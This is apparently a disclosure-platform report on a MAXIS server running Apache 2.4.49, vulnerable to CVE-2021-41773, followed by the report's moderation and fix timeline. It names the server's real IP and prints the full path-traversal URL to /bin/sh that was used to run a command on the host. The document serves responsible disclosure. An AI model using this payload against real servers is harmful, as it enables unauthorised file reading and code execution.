- Creation
- Validation
- Communication & fix
- Disclosure
MAXIS / Apache 2.4.49 vulnerable to CVE-2021-41773
Kaizen
reported 2021-10-20
Your server was found vulnerable to CVE-2021-41773.
Attackers can read any file from your server.
Under some circumstances attackers are able to execute code on your server.
Potentially fixed by KaizenSecurity outside LeakIX
IP:
202.75.151.82Port:
443Detected protocol:
httpsVulnerable URL:
https://202.75.151.82/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/shFound processes trough Apache RCE:
<redacted>...
cat�/proc/self/cmdline�
Found by Apache2449TraversalPlugin 2021-10-18
Report created by
Kaizen
2021-10-20
Kaizen
2021-10-20
Report edited by
Kaizen
2021-10-20
Kaizen
2021-10-20
Report edited by
BloodyShell
2021-10-22
BloodyShell
2021-10-22
BloodyShell
commented 2021-10-22:
approved
shows in report
Really sorry we missed this one. We've been contacted by Maxis directly. In the future please try to include a contact to the company itself as it will speed-up the moderation process !
Report comment dispatched to Kaizen by system 2021-10-22
Report edited by
BloodyShell
2021-10-22
BloodyShell
2021-10-22
Report approved by
BloodyShell
2021-10-22
BloodyShell
2021-10-22
New PDF report generated by system 2021-10-22
Report dispatched to ...@... by system 2021-10-22
Report marked as fixed by
BloodyShell
2021-10-22
BloodyShell
2021-10-22
Report closed by
BloodyShell
2021-10-22
BloodyShell
2021-10-22
New PDF report generated by system 2021-10-22
Report edited by
BloodyShell
2021-10-23
BloodyShell
2021-10-23
New PDF report generated by system 2021-10-23
BloodyShell
commented 2021-10-23:
approved
doesn't show in report
Done !
Report comment dispatched to Kaizen by system 2021-10-23
Information
Owner
MAXIS
Created
2021-10-20 17:49
Updated
2021-10-23 17:21
Fixed
true
Contacts
k...@gmail.com
Status
Status
closed
Hosting contacted
false
CERT contacted
false
Download report